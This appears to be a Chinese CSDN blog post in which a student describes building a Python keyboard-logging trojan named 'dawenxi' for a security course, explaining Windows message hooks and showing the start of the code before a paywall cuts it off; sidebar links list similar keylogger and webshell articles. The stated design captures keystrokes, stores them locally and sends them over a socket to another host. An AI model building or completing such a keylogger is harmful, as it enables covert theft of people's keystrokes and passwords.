一个简单的键盘监听木马dawenxi的制作

最新推荐文章于 2023-08-19 15:18:35 发布
VIP文章 最新推荐文章于 2023-08-19 15:18:35 发布
阅读量1.9k 收藏 14
点赞数 4
分类专栏: python小程序 文章标签: python 安全 socket
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48637067/article/details/111698825
版权

事实上,我最初是没想到这学期的物联网安全课程会以答辩形式作为考核的,更没想到的是老师竟然让我们自己设计一个针对物联网的病毒或者针对物联网的漏洞,还要求不能被查杀。这难度,属实大?_? 。可是,我不想挂科啊,就只能硬着头皮来了。
我害怕答辩时会出现功能相似的作品,就没有考虑wifi安全、U盘安全、路由器安全等(果然,答辩的时候一堆这几方面的作品,现在想想,还是后怕,哈哈)。灵感来自于之前上的一门《逆向工程》,在这门课的配套书上,我看到过记录键盘的木马程序。键盘可以说是我们最常用的硬件了,所以键盘的安全问题也就相当于是物联网的安全问题啦?哈哈,就这个了。
首先,我们要知道“消息钩取”的机制。Windows的GUI以事件驱动的方式工作,键盘和鼠标的操作大都会引起事件的产生,产生事件时,操作系统会将预先定义好的消息发送给相应的应用程序,应用程序收到消息后,根据消息的内容执行相应的动作。“消息钩子”就是在事件消息从操作系统向应用程序传递的过程中,获取、查看、修改和拦截这些消息的机制。
我们所用的主要是这个函数:
HHOOK WINAPI SetWindowsHookEx(
_In_int idHook, //被安装的钩子过程的类型,像本次实验中用的WH_KEYBOARD
_In_HOOKPROC lpfn, //指向钩子过程(回调函数)的指针
_In_HINSTANCE hMod, //由lpfn指向的钩子过程所在dll的句柄
_In_DWORD dwThreadId) //钩子过程要被关联到的线程的ID(0:钩子过程关联到所有线程)
还有kernel32.dll、user32.dll、psapi.dll这三个DLL。
user32.dll提供用于执行用户界面任务的各个函数,包括键盘、鼠标操作、菜单管理等
kernel32.dll提供操作系统的核心功能服务,包括进程和线程操作、内存管理、文件访问等
psapi.dll获取进程状态
对了,还要介绍一下句柄,因为木马要用到句柄。句柄(Handle)是windows标识,由应用程序建立或使用的对象所使用的一个唯一的整数值(通常为32位)。Windows要使用各种各样的句柄来标识诸如应用程序实例、窗口、文件等对象。句柄是程序用来引用相应对象用的,一个进程被初始化时,系统要为它分配一个句柄表。
好啦,我们可以开始制作木马啦!木马的名字叫dawenxi,没错,就是“要你命三千”的发明者的名字。好的,闻西,木马主要由这几部分构成:
在这里插入图片描述
书上的键盘记录木马是用c语言写的,但是我用的是python语言。提前说明,这个木马是无害的哈!
木马的工作流程如下:钩子函数监听键盘事件—>将监听到的内容生成txt文件存储到本地—>通过套接字发送到其他主机
直接给出木马的程序:

from ctypes import *
import pythoncom  # 提供使用windows com组件的能力
import pyHook
import win32clipboard  # 调用windows剪切板
import socket
if not True:
    import codecs

'''
/**
 *author: guoguo
 *date: 2020/12/21
 *describtion: wobushidawenxia
 */
'''
# 调用核心API,存在于kernel32.dll、user32.dll、gdi32.dll这三个DLL中
user32 = windll.user32  # user32.dll提供用于执行用户界面任务的各个函数,包括键盘、鼠标操作、菜单管理等
kernel32 = windll.kernel32  # kernel32.dll提供操作系统的核心功能服务,包括进程和线程操作、内存管理、文件访问等
psapi = windll.psapi  # psapi.dll获取进程状态
current_window = None  # 将当前窗口值取零

class Trojan_guoguo:

    def get_current_process(self):
        # 获取最上层的窗口句柄
        hwnd = user32.GetForegroundWindow()
        # 获取进程ID
        pid = c_ulong(0)
        user32.GetWindowThreadProcessId(hwnd, byref(pid))
        # 将进程ID存入变量中
        process_id = "%d" % pid.value   
        # 申请内存,用以存放进程
        executable = create_string_buffer("\x00"*512)
        h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
        psapi.GetModuleBaseNameA(h_process, None
最低0.47元/天 解锁文章
杜甫不恰臭豆腐
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python连接PHP木马,并加密传输数据
m0_67403076的博客
06-12 597
前面写过两篇,但写的不多。使用python连接JSP一句话木马 使用burpsuite对python的post请求进行抓包今天想起来,于是整合一下,再搞个加密。先是在 Linux 虚拟机里面写个 “两句话木马”。 对传参进行一个 base64 解码,这就意味着在 Windows 本机上要进行一个 base64 编码。 抓包结果如下: 解码一下可以看出命令。 然后放包,Python代码接收到返回的数据。 对 shell.php 作出修改。Python 代码如下: 这些加解密算法的代码,在网上可以很容易找
Python简单监控键盘输入的木马实现
热门推荐
以笔为剑的唐吉坷德
06-02 6万+
由于文章制作木马没有隐藏,实现的功能简单,没有危险性,故将木马开源,大神勿笑。请勿进行非法木马改造。一,所需python木马目标运行环境为windows。使用的python类库为 pyHook(获取用户行为,安装提示见本人其他博文) pywin32(提供windows下的python接口,比如pythoncom) py2exe(由于木马目标运行环境为windows,该类库可以将pyth
python监听键盘输入_Python监听键盘和鼠标事件
weixin_39846378的博客
11-27 406
#coding=utf-8from ctypes import *from ctypes importwintypesimportwin32conSetWindowsHookEx=windll.user32.SetWindowsHookExAUnhookWindowsHookEx=windll.user32.UnhookWindowsHookExCallNextHookEx=windll.user...
Unity |利用Hook实现键盘输入监听
YeliQuxagi的博客
09-23 1503
钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。 钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有到达目的窗口前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理(改变)该消息,也可以不作处理而继续传递该消息,还可以强制结束消息的传递。
用C#实现低级Windows API键盘钩子
谢启东的专栏
05-05 6517
 用C#实现低级Windows API键盘钩子           一提到钩子(Hook)程序,通常都会想到是用C/C++编写的,难道托管代码(如C#)就毫无用武之地了吗,本文将要讲解的,就是如何在C#中实现键盘钩子。         .NET Framework对键盘事件只提供了一般级别的访问,如KeyPress、KeyUP、KeyDown等等,但是无法用于处理按键的组合,如
Python黑客攻防(二)键盘监听
qq_43681532的博客
07-05 1717
注:转载于微信公众号:黑客帮。已授权。本教程仅供学习交流,未经允许禁止转载。请勿用于非法用途,后果自负。大神勿喷。 前言:本篇教程演示如何编写一个键盘监听器,在内网中获取目标用户输入并保存。个人能力有限只能捕获26个英文字符和26个英文键上方的0到9,捕获到的0到9对应字符分别是“PQRSTUVWXY”,测试见文末视频。 原理:使用ctypes模块进行键盘输入信息勾取,然后通过TCP通信将勾取到的信息传输到攻击机然后保存。 (ctypes官方文档:https://docs.python.org/3.7/li
python实现键盘记录木马_python键盘监听木马(SMTP信箱收取监听结果、修改注册表自启动)...
weixin_39980129的博客
12-09 995
最近接触了python的win32库,库子提供了不少可用于windows开发的API,这里就利用这个为原理制作一个键盘监听木马的雏形。这里需要使用额外的模块pythonHook(放置钩子时),pythoncom主要监听功能相关代码:#放置键盘监听钩子def seeing():PH=pyHook.HookManager()PH.KeyDown=KeyboardEventPH.HookKeyboard...
特洛伊木马(二)——键盘与鼠标的监听 - 佳 - CSDNBlog
xu的blog
07-03 1866
导读:   新一篇: 我是怎么了   木马是如何获取别人密码的呢?方法有很多,比如欺骗法(伪造一个假的界面,来骗取对方的密码),监听对方的键盘鼠标操作,或者直接侵入到系统文件夹中,找到保存密码的文件,等等。这里,我着重研究的是关于键盘和鼠标监听的技术。   首先,我们必须了解windows的消息处理机制。在windows系统下,对于某一窗口,用户或者系统对它的操作都是一个消息,这些消息会放
在Visual C++中实现一个DLL木马
zhihu008的专栏
07-25 6593
在Visual C++中实现一个DLL木马   写一个木马挂载程序,听起来似乎很玄,其实也很简单,本文将告诉你怎样用Visual C++实现一个侵入木马的程序。本文主要涉及动态链接库(DLL木马,目前相当多数的木马病毒都以这种方式被加载。 DLL木马攻击指的是编程者在DLL中包含木马程序代码,随后在目标主机中选择特定目标进程,以某种方式强行指定该进程调用包含这个木马程序的D
MSFVenom各类环境下的木马制作
oiadkt的博客
03-09 877
MSFVenom各类环境下的木马制作
C# winFrom 鼠标、键盘监听
csdn_aspnet的专栏
01-18 2835
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Text; using System.Windows.Forms; using System.Reflection; us
unity监听底层鼠标键盘
weixin_41798071的博客
08-26 280
我使用一款插件时,这款插件只适合PC配合鼠标键盘,我需要做触摸屏,上下左右滑动 我就直接模拟鼠标键盘事件 [DllImport("user32.dll", EntryPoint = "keybd_event")] static extern void keybd_event( byte bVk, //虚拟键值 对应按键的ascll码十进制值 byte bScan, //0 int dwFlags,
python结合邮件制作木马程序
最新发布
2301_79455688的博客
08-19 1537
以上代码就是木马程序的核心,可以继续添加功能,但万不可做违法的事,下一期是一个炫酷的病毒控制端。
python如何实现人工智能应用锁_常见加密方式及Python实现
weixin_35875219的博客
02-20 304
本文首发于:行者AI由于计算机软件的非法复制,通信的泄密、数据安全受到威胁,所以加密在开发过程中是经常使用到的技术,在一些重要场景中都有所应用,如:登录、支付、oauth等,场景不同需要搭配不一样的签名加密算法来达到业务目标。1. 加密算法的种类加密算法分散列算法、对称加密、非对称加密。(1)散列算法:经常需要验证消息的完整性,散列(Hash)函数提供了这一服务,它对不同长度的输入消息,产生固定长...
python实现键盘记录木马
乐枕的家
02-18 9140
pyHook第三方库,用于捕捉特定的Windows事件,封装了所有底层调用,我们 只需要关注程序逻辑。更多内容及使用方法请自行查找 下载链接:http://sourceforge.net/projects/pyhook/主干逻辑图当程序运行后,每当用户在键盘按下一个键,就会触发钩子函数,调用 键盘记录函数 记录按键内容,该函数又会调用 进程切换函数 来应对焦点窗口切换的情况并打印出相应的进程名称
python编写木马攻击_python实现一个简单木马
weixin_39646018的博客
12-05 6001
一个简单木马程序绝大多数的木马程序都是基于Socket来实现的废话少说直接上代码!代码:client部分:# -*- coding: UTF-8 -*-import socketimport sysimport reimport osclass Client:def __init__(self, serverIp, serverPort):self.serverIp = serverIp # ...
安全攻防知识-5】木马利用
qq_26579613的博客
05-17 876
1、木马类型 本文仅介绍与渗透攻击密切相关的木马。 1.1 远程控制型木马 以让攻击者完全控制被入侵的主机,攻击者可以利用它完成一些甚至连主机主人本身都不能顺利进行的操作。该种类的木马往往集成了其他种类木马的功能,可以任意访问文件、获取目标主机用户的私人信息,包括信用卡、银行账号等至关重要的信息。 1.2 密码发送木马 密码发送木马是为专门盗取被感染主机上的密码而编写的,木马一旦被执行,就会自动搜索内存、 Cache、临时文件夹以及各种敏感密码文件,一旦搜索到有用的密码,木马就会利用免费的电子邮件
python实现键盘记录木马_PYTHON简易木马键盘记录)编译通过
weixin_39843847的博客
12-09 305
PTYHON 2.7PIP(简直是神器,就靠它了)pip记得加在系统变量里面pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whlpip install pywin32from ctypes import *import pyHookimport pythoncomimport win32clipboarduser32 = windll.user32ke...
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第八章 Windows常见特洛伊木马任务(1)有趣的键盘记录器
阿尔泰野狼的博客
10-21 829
本文记录了博主在阅读Black Hat Python 2nd Edition过程中的心得与踩坑经历。
安卓局域网外实现木马监听
qq_33827423的博客
07-28 2047
此分享只用于局域网安全测试以及无线网络工作原理的学习,不可用于有损于他人的局域网正常工作及网络安全*此分享中的所有局域网测试都在私人网络环境中进行,未对他人的正常生活造成干扰话接上回,自从二狗子的隔壁少了些许吵杂以后,每日的闲暇使得二狗子猛然觉得,这本就方寸之地,在这白昼与黑夜之间切换又开始变得索然无味了。二狗子觉得该干点什么。。。他在那张凌乱不堪的桌子上静静的等着,就如同以为以猎物的方式出现的猎人一般。最近二狗子迷上一款“我只是帮朋友看看“的这么一款软件。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值